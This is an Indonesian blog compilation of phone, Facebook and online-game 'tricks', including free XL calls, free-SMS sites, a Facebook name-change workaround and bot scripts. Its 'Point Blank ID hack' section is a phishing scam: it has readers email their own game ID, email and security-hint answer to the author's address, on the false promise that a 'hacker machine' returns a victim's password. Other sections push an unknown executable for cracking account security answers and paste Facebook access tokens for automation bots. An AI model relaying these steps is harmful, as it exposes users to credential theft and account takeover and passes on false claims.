Cara nelfon Gratis XL

Trik Nelpon Gratis XL 2012 Terbaru
Trik Nelpon Gratis XL 2012 Terbaru | Cara
Gratis Telpon Perdana XL ~ Ternyata orang
indonesia suka yang gratis gratis yah..
heheeπŸ™‚ dari hasil penelitian saya sampai
sampai terdapat keyword di shearh google,
tapi tidak jauh jauh dengan saya, kalo ada
yang gratis kenapa mesti bayar, ya kan… Ok
sob kita langsung pada pokok pembicaraan
dengan topik kaita kali ini tentang tips
telpon gratis.
Sobat harus mengirim sms dengan
mengunakan Xsms caranya telpn 123
5*99*1*1*1# nanti ada tulisan ‘Tulis
PesanMu’ pilih BALAS dan anda tulis apa
saja sesuka anda. Jika sudah klik OK nanti
ada tulisan ‘Masukan No Tujuan’ anda
masukan nomor anda/nomor temen,pacar
(harus no XL). kemudian akan ada SMS dari
2767 anda balas ketik STOP kirim deh,
tunggu balasannya. Setelah itu anda telpon
nomor yang akan anda tuju tapi no XL
jugak karena hanya bisa sesama. Usahakan
pulsa anada Rp.0,-
Saya sendiri sudah mencobanya dan
berhasil, silahkan sobat mencoba juga cara
tersebut, SEMOGA BERHASIL “SELAMAT
MENCOBA”
Nah demikianlah “Trik Nelpon Gratis XL
2012 Terbaru” semoga bisa berguna dan
bermanfaat buat sobat

Jangan Lupa Add http://facebook.com/agung.sniper.dearπŸ˜€πŸ˜‰

Cara Sms Gratis 2013

Cara Kirim SMS Gratis Sepuasnya
Pengen tahu cara kirim SMS gratis
sepuasnya? Maka coba layanan-layanan
berikut ini. Dengan semua layanan ini kamu
dapat kirim SMS gratis sepuasnya. Asik
bukan? Apalagi sekarang ini semua
penyedia GSM tidak lagi berikan fasilitas SMS
gratis. Jadi ini sebuah solusi.
Oke deh langsung saja jikalau rekan semua
ingin kirim SMS gratis sepuasnya silahkan
menuju alamat-alamat url berikut ini.
http://www.smsgratis2indonesia.com/ : maksimal 160 huruf, SMS
cepat sampai, saya
rekomendasikan!
http://sms-gratis.web.id/news.php , layanan bagus buat
kirim SMS gratis.
http://www.kusms.com/, juga
saya rekomendasikan karena
SMS cepat sampai.
http://www.freesms4us.com/,
juga bagus buat kirim SMS
gratis dan cepat!
http://www.sms-online.web.id/ , sekarang ini
hanya bisa kirim SMS ke nomor
Telkomsel saja.
Perlu di ingat namanya juga gratis pasti ada
kekurangannya, yakni delay atau
penundaan. SMS anda tidak langsung
nyampe bisa hitungan jam mungkin. Dan
lagi kekurangan lainnya. Oke?
Itulah cara kirim SMS gratis sepuasnya.

Cara Ganti Nama Facebook Sepuasnya

CARA GANTI NAMA FB SEPUASNYA TANPA
BATAS
*cara BARU*
Cara mengganti nama fb sampe berkali-kali ,
dan 100% berhasil dengan menggunakan
HP lebih baik gunakan Opera Mini atau lebih
bagus lagi dengan komputer;
Pertama : Ubah nama fb anda ke nama yang
sebelumnya
Contoh : Nama Sekarang : Mufiyanto
Nama yg sebelumnya atau nama awal:
Naufal Miqdad
nah ubah nama anda ke β€œNaufal Miqdad”
aja; ini link ubah nama : https://www.facebook.com/settings?tab=account&section=name&t
atau ganti di pengaturan fb biasa
(DAN MEMANG SEKARANG TIDAK BISA
MENGANTINYA LANGSUNG SEPERTI DULU, ,
JADI HARUS DITULIS LAGI SAMA PERSIS
DENGAN NAMA2 YG DULU PERNAH DI PAKAI)
Setelah berhasil mengubah ke nama
sebelumnya sekarang buka : http://facebook.com/hacked
-Klik amankan akun
-buat password baru anda
-klik lanjutkan ceklis semua email anda
-klik lanjutkan ntar ada tlisan gnti nama
-klik Ganti Nama
-ya sudah gnti aja
-lalu klik lanjutkan Selesai deh
*CARA GANTI NAMA SEPUASNYA cara LAMA*
Oke.!
langkah pertama kalau kamu menggunakan
hp.
Lebih baik menggunakan opera mini..
Dengan tampilan fullsite {tampilan
komputer}
=km masuk ke akun fb km
=kalau sudah masuk kamu tinggal
ganti nama kamu ke nama yg
dulu pernah kamu pakai atau
langsung klik PERBARUI
NAMA.
^
[ caranya km tinggal klik
>AKUN
>PENGATURAN AKUN
>GANTI NAMA ]
=kalo sudah silahkan anda masuk ke link
ini>>
http://www.facebook.com/roadblock/roadblock_me.php?r=5
=lalu klik
>AMANKAN AKUN
>dan ikuti langkah demi langkah
dan lihatlah perbedaan pada
langkah KETIGA setelah LINK
GANTI TANGGAL LAHIR
^
[cONTOH: tanggal 02/mei/2009 (ganti)
lalu klik ganti]
=kalo sudah di ganti klik SIMPAN DAN
LANJUTKAN
dan LINK GANTI NAMA KAMU
telah muncul.. ,Silahkan Ganti
Nickname akun fb kamu yg
baru dan hore nama baru
kamu berhasil. Untuk
mengganti nama sepuasnya
kamu tinggal ulangi langkah
di atas tanpa ganti tgl lahir
lagi.

sblum langkah2nya slesai jgn exit atau
pindah ke branda/profile/dll
#kalau sudah berhasil memakai cara baru or
lama anda hrus gnti nma yg awal dulu atau
nama sebelumnya dan gunakan cara trsebut
lgi
Semoga Bermanfaat

Jangan Lupa share

Jangan Lupa jga add http://facebook.com/agung.sniper.dear
πŸ˜€πŸ™‚πŸ˜‰πŸ™‚πŸ˜‰

Cara Hack ID Point Blank 2013

Cara Hack ID Point Blank 2013
Bagaimana cara mengetahui password ID
PB orang lain (100% BEKERJA)
Dimohon Gunakan layanan ini dengan bijak
(MOHON JANGAN DISALAHGUNAKAN)
Caranya sangat MUDAH anda cukup
mengirimkan email ke mesin hacker ID PB.
Setelah itu mesin hacker akan mengirimkan
password Point blank yang anda minta.
langkah-langkahnya :
-login ke email anda. (khusus pengguna
yahoo/gmail)
-Lanjutkan ke halaman mengirim pesan.
-Kirim email ke : agung.dewapb@yahoo.com(Email Yahoo)
-bcc: cc: (biarkan kosong)
-Subject: PASSWORD RETRIEVE
-Isi pesan :
baris pertama tulisID point blank anda.
baris kedua tulis ID point blank korban.
baris ketiga tulis Email Dan Hint
anda.
baris keempat tulis pangkat anda sekarang.
baris kelima tulis pangkat korban.
baris keenam tulis dengan kode ini :
cgi-bin/$et76431&pwr999457
Ini contoh pesan yang harus anda kirim :
To : agung.dewapb@yahoo.com
Bc: (biarkan kosong)
Subject : Hack ID PB
Isi :
ID Anda : aldy030295
ID org yg ingin di hack : acel111
Email:Kucing123@yahoo.com
hint Answer:Hijau
pangkat anda : 1st Lt. Grade 1 (diamond 2)
pangkat Korban : Major Grade 5 (matahari
emas)
Sertakan Jga code ini : cgi-bin/$
et76431&pwr999457
CATATAN :
1. INGAT anda mengirimkan email ke mesin
bukan ke orang.Anda akan mendapat
pemberitahuan setiap jam 01 siang.
2. FUNGSIi anda memberikan password
adalah untuk memudahkan mesin
mencocokkan password anda dengan
password si korban, jika password tersebut
tidak sama, maka anda akan mendapat
pemberitahuan bahwa password anda
berbeda dan tentunya mesin akan
mengirimkan password si korban juga ke
email anda.
3. JIKA anda mendapat pemberitahuan
“Cannot find a password ! Give a little time
to fix this problem, We will sent back your
request for a few TIME”
tunggu beberapa jam,dan mesin hacker
akan mengirimkan password lagi ke anda.
(paling lama 24 jam)
4. Walaupun email anda yahoo, namun
email si korban gmail, tidak menjadi
masalah.namun ingat ini hanya berlaku
untuk pengguna YAHOO! dan GMAIL.
GOOD LUCK…
100% BERHASIL

jangan Lupa Add http://facebook.com/agung.sniper.dearπŸ™‚ Semoga BerhasilπŸ˜‰πŸ˜‰πŸ˜‰

Cara Bobol Hint Answer Point Blank

Cara Bobol Pasw Hint. Security Question n
Answer Gemscool.
Download: http://www.mediafire.com/?twyuooku81fuwnd
Tutor:
– Buka Leopard.exe yg ada di dalam rar yg di
download td.
– Usahakan sampai ada tulisan “SUCCESS!”
– Login ke Gemscool.
– Setelah login klik kanan edit profile. Klik
tulisan properties.
– pilih normal.
– maka tampilan lama gemscool akan keliatan.
Success.

Jangan Lupa Add
http://facebook.com/Agung.sniper.dear

Dan Follow @agung_dewapb

πŸ™‚πŸ˜€πŸ˜‰ SemOga BerHarSilπŸ˜€πŸ™‚πŸ˜‰

Cara Membuat Bot Like Dan Comentar Facebook

Assalamu’alaikum. Kali ini saya mau
memberi tutorial membuat bot like dan
komentar. Pertama anda harus daftar ke
http://kaltenghost.com atau http://idhostinger.com atau
hosting lain yang support php dan MySQL.
Setelah register download file ini http://bot.zip lalu
edit akses token di dalamnya. Kalau belum
punya akses token bisa lihat disini
Klik Untuk Akses Token
https://m.facebook.com/#access_token=AAAAAEOyFTakBAKXCKL1zbVO1E5ZBasRzMP2rHOHcAtC4o6SKwas3ZB06wAENLSpaDlj5t6UJUHkR0TPRhpadhZAx2vhO9NcE3u1wGBWKgZDZD&expires_in=0
. Dan
copy Paste ”
AAAAAAIo4oJoBCKyYtI988h35TLbkiPsdsdewHA0lADGt2GBKZAuaW3dSAZDZD”
. Lalu copy huruf AA sampai ZD, lalu
masukan kedalam script tadi seperti ini.
.
Setelah diedit tadi, upload scriptnya tadi ke
hostingan anda. Kalo sudah tes dulu botnya,
cara tesnya adalah ‘alamat-
anda.subdomain.com/nama.php’, kalo saya
‘bot.16mb/bot.php’.
1.png
Jika pada opera mini server time out, cek
facebook anda. Kalau sudah ada ‘Batal Suka’
di salah satu status teman anda, dan bukan
anda yang melakukan maka bot berhasil
dibuat. Yang terakhir membuat Cron jobs,
cron jobs yang menjalankan bot secara
otomatis. Pertama register ke
webbasedcron. Kalo sudah set cron jobnya.
Caranya adalah, seperti ini.
scr10-30-11.png
Lalu
3.png
tergantung agan dimana menaruh bot
nya.kalau saya cuma public_html/nama.php.
Kalau cron job sudah dibuat berarti bot
sukses.
Sekian posting kali ini, WASSALAM

Script bot auto respon komentar dan respon like terbaru
Penjelasan sedikit tentang bot auto respon komen dan bot auto respon like: 1. Bot auto respon komentar bot ini akan bertugas untuk mengomentari kembali status kamu yang di komentari oleh orang lain. Contoh: kamu bikin status, trus si A ngomen maka robot kamu lah yg akan membalas komentar dari si A 2. Bot auto respon like Nah kalo bot ini akan bekerja jika kamu membuat komentar di status kamu ataupun di status oranglain, kemudian ada orang yg ngelike komentar kamu maka bot ini akan bertugas untuk mengucapkan terima kasih karena telah nge like komentar kalian. Bagaimana jelas kan ? Kalo udh ngerti cara pemasangannya sama seperti bot autolike dan bot auto komentar kalo belum ngerti cara pemasangannya lihat di posting saya sebelumnya nih script auto respon komentar dan auto respon like nya: http://respon_like.zip – Respon http://komen.zip
– selamat mencoba semoga sukses

by Agung Galih Saputra

πŸ™‚ :*πŸ˜€πŸ˜¦πŸ™‚ :@

jangan Lupa Add MeπŸ˜‰ https://www.facebook.com/agung.sniper.dear?refid=8